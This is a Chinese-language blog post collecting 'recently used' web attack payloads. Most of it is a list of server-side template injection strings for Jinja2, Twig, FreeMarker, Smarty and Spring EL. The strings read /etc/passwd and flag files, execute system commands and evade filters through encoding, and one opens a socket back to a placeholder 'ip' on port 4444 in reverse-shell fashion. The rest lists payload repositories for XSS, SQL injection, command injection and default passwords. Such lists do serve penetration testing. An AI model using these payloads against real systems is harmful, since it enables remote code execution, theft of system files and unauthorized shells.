文章23
标签6
分类2

最近用到的payload

1、Server Side Template Injection Payloads(服务端模板注入 SSTI-payloads)

{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]   ("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\   x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x   ()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).co   ncat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
References :

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection

https://portswigger.net/research/server-side-template-injection

https://www.indusface.com/learning/application-security/server-side-template-injection/

项目地址:

https://github.com/payloadbox/ssti-payloads

项目上包含了很多其他的一些payloads.(大家自行查看)

2、Git All The Payloads! A Collection Of Web Attack Payloads(git关于web的payloads)

项目地址:

https://github.com/foospidy/payloads

可以使用get.sh解压下载文件

Payload Credits

fuzzdb - https://github.com/fuzzdb-project/fuzzdb

SecLists - https://github.com/danielmiessler/SecLists

xsuperbug - https://github.com/xsuperbug/payloads

NickSanzotta - https://github.com/NickSanzotta/BurpIntruder

7ioSecurity - https://github.com/7ioSecurity/XSS-Payloads

shadsidd - https://github.com/shadsidd

shikari1337 - https://www.shikari1337.com/list-of-xss-payloads-for-cross-site-scripting/

xmendez - https://github.com/xmendez/wfuzz

minimaxir - https://github.com/minimaxir/big-list-of-naughty-strings

xsscx - https://github.com/xsscx/Commodity-Injection-Signatures

TheRook - https://github.com/TheRook/subbrute

danielmiessler - https://github.com/danielmiessler/RobotsDisallowed

FireFart - https://github.com/FireFart/HashCollision-DOS-POC

HybrisDisaster - https://github.com/HybrisDisaster/aspHashDoS

swisskyrepo - https://github.com/swisskyrepo/PayloadsAllTheThings

1N3 - https://github.com/1N3/IntruderPayloads

cujanovic - https://github.com/cujanovic/Open-Redirect-Payloads

cujanovic - https://github.com/cujanovic/Content-Bruteforcing-Wordlist

cujanovic - https://github.com/cujanovic/subdomain-bruteforce-list

cujanovic - https://github.com/cujanovic/CRLF-Injection-Payloads

cujanovic - https://github.com/cujanovic/Virtual-host-wordlist

cujanovic - https://github.com/cujanovic/dirsearch-wordlist

lavalamp- - https://github.com/lavalamp-/password-lists

arnaudsoullie - https://github.com/arnaudsoullie/ics-default-passwords

scadastrangelove - https://github.com/scadastrangelove/SCADAPASS

jeanphorn - https://github.com/jeanphorn/wordlist

j3ers3 - https://github.com/j3ers3/PassList

nyxxxie - https://github.com/nyxxxie/awesome-default-passwords

foospidy - https://github.com/foospidy/web-cve-tests

OWASP

dirbuster - https://www.owasp.org/index.php/DirBuster

fuzzing_code_database - https://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database

JBroFuzz - https://www.owasp.org/index.php/JBroFuzz

Other

xss/ismailtasdelen.txt - https://github.com/ismailtasdelen/xss-payload-list

xss/jsf__k.txt - http://www.jsfuck.com/

xss/kirankarnad.txt - https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

xss/packetstorm.txt - https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

xss/smeegessec.com.txt - http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html

xss/d3adend.org.txt - http://d3adend.org/xss/ghettoBypass

xss/soaj1664ashar.txt - http://pastebin.com/u6FY1xDA

xss/billsempf.txt - https://www.sempf.net/post/Six-hundred-and-sixty-six-XSS-vectors-suitable-for-attacking-an-API.aspx (http://pastebin.com/48WdZR6L)

xss/787373.txt - https://84692bb0df6f30fc0687-25dde2f20b8e8c1bda75aeb96f737eae.ssl.cf1.rackcdn.com/--xss.html

xss/bhandarkar.txt - http://hackingforsecurity.blogspot.com/2013/11/xss-cheat-sheet-huge-list.html

xss/xssdb.txt - http://xssdb.net/xssdb.txt

xss/0xsobky.txt - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

xss/secgeek.txt - https://www.secgeek.net/solutions-for-xss-waf-challenge/

xss/reddit_xss_get.txt - All XSS GET requests from https://www.reddit.com/r/xss (as of 3/30/2016)

xss/rafaybaloch.txt - http://www.rafayhackingarticles.net/2016/09/breaking-great-wall-of-web-xss-waf.html

xss/alternume0.txt - https://www.openbugbounty.org/reports/722726/

xss/XssPayloads - https://twitter.com/XssPayloads

sqli/camoufl4g3.txt - https://github.com/camoufl4g3/SQLi-payload-Fuzz3R/blob/master/payloads.txt

sqli/c0rni3sm.txt - http://c0rni3sm.blogspot.in/2016/02/a-quite-rare-mssql-injection.html

sqli/sqlifuzzer.txt - https://github.com/ContactLeft/sqlifuzzer/tree/master/payloads

sqli/harisec.txt - https://hackerone.com/reports/297478

sqli/jstnkndy.txt - https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/

sqli/d0znpp.txt - https://medium.com/@d0znpp/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0f

sqli/libinjection-bypasses.txt - https://gist.github.com/migolovanov/432fe28c8c7e9fa675ab3903c5eda77f

traversal/dotdotpwn.txt - https://github.com/wireghoul/dotdotpwn

codeinjection/fede.txt - https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/

commandinjection/ismailtasdelen-unix.txt - https://github.com/ismailtasdelen/command-injection-payload-list

commandinjection/ismailtasdelen-windows.txt - https://github.com/ismailtasdelen/command-injection-payload-list

CTF

Requests extracted from either packet captures or log files of capture the flag (ctf) events. Mostly raw data so not all requests are actual payloads, however requests should be deduplicated.

maccdc2010.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2011.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2012.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

ists12_2015.txt - Information Security Talent Search (http://ists.sparsa.org/), source: http://www.netresec.com/?page=ISTS

defcon20.txt - DEFCON Capture the Flag (https://www.defcon.org/html/links/dc-ctf.html), source: http://www.netresec.com/?page=PcapFiles


Miscellaneous

    XSS references that may overlap with sources already included above:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://htmlpurifier.org/live/smoketests/xssAttacks.php

0 评论